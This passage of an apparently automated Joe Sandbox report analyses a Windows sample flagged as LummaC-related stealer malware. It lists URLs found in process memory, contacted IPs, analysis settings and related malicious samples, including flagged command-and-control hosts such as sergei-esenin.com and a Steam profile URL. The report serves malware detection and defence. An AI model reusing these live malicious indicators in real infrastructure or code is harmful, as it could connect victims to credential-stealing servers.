                            https://steamcommunity.com/profiles/76561199724331900/inventory/file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219908926.0000000001596000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001596000.00000004.00000020.00020000.00000000.sdmptrue
                            • URL Reputation: malware
                            		unknown
                            https://www.youtube.com/file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                            https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&afile.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219908926.0000000001596000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001596000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                            https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgfile.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219908926.0000000001596000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001596000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://store.steampowered.com/privacy_agreement/file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=enfile.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://sergei-esenin.com:443/apifile.exe, 00000001.00000003.2219908926.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015BD000.00000004.00000020.00020000.00000000.sdmptrueunknown
                            https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amfile.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://www.google.com/recaptcha/file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                            https://checkout.steampowered.com/file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishfile.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                            https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishfile.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngfile.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://avatars.akamai.steamstaticfile.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              https://sergei-esenin.com/Z$file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmptrue
                                		unknown
                                https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisfile.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCfile.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://store.steampowered.com/;file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://store.steampowered.com/about/file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://steamcommunity.com/my/wishlist/file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=cdfmfile.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219908926.0000000001596000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001596000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=englishfile.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://help.steampowered.com/en/file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                https://steamcommunity.com/market/file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://store.steampowered.com/news/file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://community.akamai.steamstatic.com/file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://store.steampowered.com/subscriber_agreement/file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219908926.0000000001596000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001596000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgfile.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219908926.0000000001596000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001596000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                  https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://recaptcha.net/recaptcha/;file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=enfile.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://sergei-esenin.com/.file.exe, 00000001.00000002.2231066264.00000000015DA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219908926.00000000015DA000.00000004.00000020.00020000.00000000.sdmptrue
                                    		unknown
                                    https://steamcommunity.com/discussions/file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://store.steampowered.com/stats/file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://medal.tvfile.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://broadcast.st.dl.eccdnx.comfile.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219908926.0000000001596000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001596000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://store.steampowered.com/steam_refunds/file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://sergei-esenin.com/apiFfile.exe, 00000001.00000002.2231066264.00000000015DA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219908926.00000000015DA000.00000004.00000020.00020000.00000000.sdmptrue
                                        		unknown
                                        https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://steamcommunity.com/workshop/file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://login.steampowered.com/file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://store.steampowered.com/legal/file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219908926.0000000001596000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001596000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=efile.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=qu55UpguGheU&amp;l=efile.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvfile.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=englfile.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://recaptcha.netfile.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://store.steampowered.com/file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwfile.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.giffile.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219908926.0000000001596000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001596000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://127.0.0.1:27060file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://steamcommunity.com/profiles/76561199724331900Jfile.exe, 00000001.00000003.2219908926.00000000015B0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015B0000.00000004.00000020.00020000.00000000.sdmptrue
                                                    		unknown
                                                    https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=10oP_O2Rfile.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219908926.0000000001596000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001596000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=englishfile.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://help.steampowered.com/file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://api.steampowered.com/file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://store.steampowered.com/account/cookiepreferences/file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219908926.0000000001596000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001596000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://store.steampowered.com/mobilefile.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://steamcommunity.com/file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&amp;l=englishfile.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        104.21.53.8
                                                        		sergei-esenin.comUnited States
                                                        		13335CLOUDFLARENETUStrue
                                                        104.102.49.254
                                                        		steamcommunity.comUnited States
                                                        		16625AKAMAI-ASUSfalse

                                                        General Information

                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1528876
                                                        Start date and time:2024-10-08 11:17:14 +02:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 4m 53s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:7
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:file.exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.evad.winEXE@1/0@10/2
                                                        EGA Information:
                                                        • Successful, ratio: 100%
                                                        HCA Information:Failed
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe

                                                        Warnings

                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        05:18:13API Interceptor2x Sleep call for process: file.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        104.21.53.8VmRHSCaiyc.exeGet hashmaliciousLummaC, VidarBrowse
                                                          SecuriteInfo.com.Trojan.DownLoader47.43340.9153.30810.exeGet hashmaliciousLummaCBrowse
                                                            file.exeGet hashmaliciousLummaCBrowse
                                                              SecuriteInfo.com.Win32.PWSX-gen.27846.23954.exeGet hashmaliciousLummaCBrowse
                                                                lihZ6gUU7V.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                    CSY6k9gpVb.exeGet hashmaliciousLummaCBrowse
                                                                      TuQlz67byH.exeGet hashmaliciousLummaCBrowse
                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                          c3KH2gLNrM.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Stealc, VidarBrowse
                                                                            104.102.49.254http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                            • www.valvesoftware.com/legal.htm

                                                                            Domains

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            sergei-esenin.comfile.exeGet hashmaliciousLummaCBrowse
                                                                            • 172.67.206.204
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                            • 172.67.206.204
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                            • 172.67.206.204
                                                                            lHHfXU6Y37.exeGet hashmaliciousLummaCBrowse
                                                                            • 172.67.206.204
                                                                            VmRHSCaiyc.exeGet hashmaliciousLummaC, VidarBrowse
                                                                            • 104.21.53.8
                                                                            j8zJ5Jwja4.exeGet hashmaliciousLummaCBrowse
                                                                            • 172.67.206.204
                                                                            SecuriteInfo.com.Trojan.DownLoader47.43340.27469.30352.exeGet hashmaliciousLummaCBrowse
                                                                            • 172.67.206.204
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                            • 172.67.206.204
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                            • 172.67.206.204
                                                                            SecuriteInfo.com.Trojan.DownLoader47.43340.9153.30810.exeGet hashmaliciousLummaCBrowse
                                                                            • 104.21.53.8
                                                                            steamcommunity.comfile.exeGet hashmaliciousLummaCBrowse
                                                                            • 104.102.49.254
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                            • 23.210.122.61
                                                                            20fUAMt5dL.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                            • 104.102.49.254
                                                                            main.binGet hashmaliciousUnknownBrowse
                                                                            • 104.102.49.254
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                            • 104.102.49.254
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                            • 104.102.49.254
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                            • 104.102.49.254
                                                                            lHHfXU6Y37.exeGet hashmaliciousLummaCBrowse
                                                                            • 104.102.49.254
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                            • 104.102.49.254
                                                                            7AeSqNv1rC.exeGet hashmaliciousMicroClip, VidarBrowse
                                                                            • 104.102.49.254

                                                                            ASNs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            CLOUDFLARENETUSSiparis PO# DT-TE-160924R0 _323282-_563028621286 pdf .exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 188.114.97.3
                                                                            https://we.tl/t-BVtGtb0HLzGet hashmaliciousUnknownBrowse
                                                                            • 104.17.25.14
                                                                            na.elfGet hashmaliciousUnknownBrowse
                                                                            • 104.28.142.242
                                                                            Message_2551600.emlGet hashmaliciousUnknownBrowse
                                                                            • 1.1.1.1
                                                                            na.elfGet hashmaliciousUnknownBrowse
                                                                            • 104.16.244.186
                                                                            NXPYoHNSgv.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 188.114.96.3
                                                                            Oilmax Systems Updated.xlsGet hashmaliciousUnknownBrowse
                                                                            • 188.114.96.3
                                                                            Oilmax Systems Updated.xlsGet hashmaliciousUnknownBrowse
                                                                            • 188.114.96.3
                                                                            SWIFT 103 202410071519130850 071024.pdf.vbsGet hashmaliciousRemcosBrowse
                                                                            • 188.114.97.3
                                                                            September Report 24'.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                            • 104.21.56.207
                                                                            AKAMAI-ASUSna.elfGet hashmaliciousUnknownBrowse
                                                                            • 104.84.82.83
                                                                            Message_2551600.emlGet hashmaliciousUnknownBrowse
                                                                            • 2.19.126.160
                                                                            na.elfGet hashmaliciousUnknownBrowse
                                                                            • 23.7.233.67
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                            • 104.102.49.254
                                                                            na.elfGet hashmaliciousMiraiBrowse
                                                                            • 23.41.157.216
                                                                            na.elfGet hashmaliciousMiraiBrowse
                                                                            • 104.86.71.39
                                                                            na.elfGet hashmaliciousMiraiBrowse
                                                                            • 104.85.197.114
                                                                            na.elfGet hashmaliciousUnknownBrowse
                                                                            • 172.229.225.204
                                                                            na.elfGet hashmaliciousUnknownBrowse
                                                                            • 172.225.218.141
                                                                            na.elfGet hashmaliciousUnknownBrowse
                                                                            • 104.80.152.78

                                                                            JA3 Fingerprints

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                            • 104.21.53.8
                                                                            • 104.102.49.254
                                                                            Oilmax Systems Updated.xlsGet hashmaliciousUnknownBrowse
                                                                            • 104.21.53.8
                                                                            • 104.102.49.254
                                                                            5zA3mXMdtG.exeGet hashmaliciousSmokeLoaderBrowse
                                                                            • 104.21.53.8
                                                                            • 104.102.49.254
                                                                            Lk9rbSoFqa.exeGet hashmaliciousSmokeLoaderBrowse
                                                                            • 104.21.53.8
                                                                            • 104.102.49.254
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                            • 104.21.53.8
                                                                            • 104.102.49.254
                                                                            20fUAMt5dL.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                            • 104.21.53.8
                                                                            • 104.102.49.254
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                            • 104.21.53.8
                                                                            • 104.102.49.254
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                            • 104.21.53.8
                                                                            • 104.102.49.254
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                            • 104.21.53.8
                                                                            • 104.102.49.254
